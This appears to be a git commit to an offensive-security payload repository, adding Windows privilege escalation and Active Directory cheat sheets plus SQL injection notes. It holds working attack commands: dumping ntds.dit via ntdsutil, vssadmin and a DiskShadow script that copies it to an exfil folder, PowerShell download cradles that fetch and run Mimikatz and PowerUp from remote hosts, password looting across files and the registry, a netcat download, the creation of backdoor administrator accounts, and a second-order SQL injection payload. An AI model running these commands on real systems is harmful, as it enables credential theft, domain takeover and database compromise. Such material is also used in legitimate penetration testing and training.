Windows PrivEsc + SQLi second order + AD DiskShadow

This commit is contained in:
Swissky 2018-05-20 22:10:33 +02:00
parent f1cb7ce50e
commit e261836532
6 changed files with 215 additions and 17 deletions

View File

@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
## Most common paths to AD compromise
@ -82,36 +83,59 @@ Get-NetGPOGroup
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
```c
**Using ndtsutil**
```powershell
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
```
or
**Using Vshadow**
```powershell
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
```
**Using DiskShadow (a Windows signed binary)**
```powershell
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
then:
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
```
**Extract hashes from ntds.dit**
then you need to use secretsdump to extract the hashes
```c
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```
Metasploit module
**Alternatives - modules**
Metasploit modules
```c
windows/gather/credentials/domain_hashdump
```
PowerSploit module
```
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
```
### Golden Tickets
Forge a TGT, require krbtgt key
@ -268,3 +292,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)

View File

@ -0,0 +1,157 @@
# Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
## Windows Version and Configuration
```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
Architecture
```powershell
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
List all env variables
```powershell
set
```
List all drives
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
```
## User Enumeration
Get current username
```powershell
echo %USERNAME% || whoami
```
List all users
```powershell
net user
whoami /all
```
List logon requirements; useable for bruteforcing
```powershell
net accounts
```
Get details about a user (i.e. administrator, admin, current user)
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
```powershell
net localgroup
```
Get details about a group (i.e. administrators)
```powershell
net localgroup administrators
```
## Network Enumeration
List all network interfaces
```powershell
ipconfig /all
```
List current routing table
```powershell
route print
```
List the ARP table
```powershell
arp -A
```
List all current connections
```powershell
netstat -ano
```
List firware state and current configuration
```powershell
netsh advfirewall firewall dump
```
List all network shares
```powershell
net share
```
## Looting for passwords
Search for file contents
```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
```
Search for a file with a certain filename
```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
```
Search the registry for key names
```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
```
Read a value of a certain sub key
```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```
## Processes Enum
What processes are running?
```powershell
tasklist /v
```
Which processes are running as "system"
```powershell
tasklist /v /fi "username eq system"
```
Do you have powershell magic?
```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```
## Uploading / Downloading files
a wget using powershell
```powershell
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
```
wget using bitsadmin (when powershell is not present)
```powershell
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
```
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
```powershell
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
```
## Spot the weak service using PowerSploit's PowerUP
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)

View File

@ -1,9 +1,14 @@
# Windows - Using credentials
Little tip, if you don't have credentials yet :D
```
```powershell
net user hacker hacker /add
net localgroup administrators hacker /add
```
Some info about your user
```powershell
net user /dom
net user /domain
```
## Metasploit - SMB

View File

@ -1,6 +1,6 @@
# POSTGRESQL
## PostgreSQL Comment
## PostgreSQL Comments
```
--
/**/

View File

@ -2,13 +2,19 @@
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
## Summary
* [Entry point detection](#)
* [DBMS Identification](#)
* [SQL injection using SQLmap](#)
* [Authentication bypass](#)
* [Polyglot injection](#)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
* [WAF Bypass](#)
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Authentication bypass](#authentication-bypass)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Second order injection](#second-order-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
@ -275,6 +281,11 @@ admin") or "1"="1"/*
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Second order injection
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
```sql
@ -392,7 +403,7 @@ mysql> mysql> select version();
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSQQL:
* MSSQL:
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:

View File

@ -1,6 +1,6 @@
# SQLite Injection
## SQLite comment
## SQLite comments
```sql
--
/**/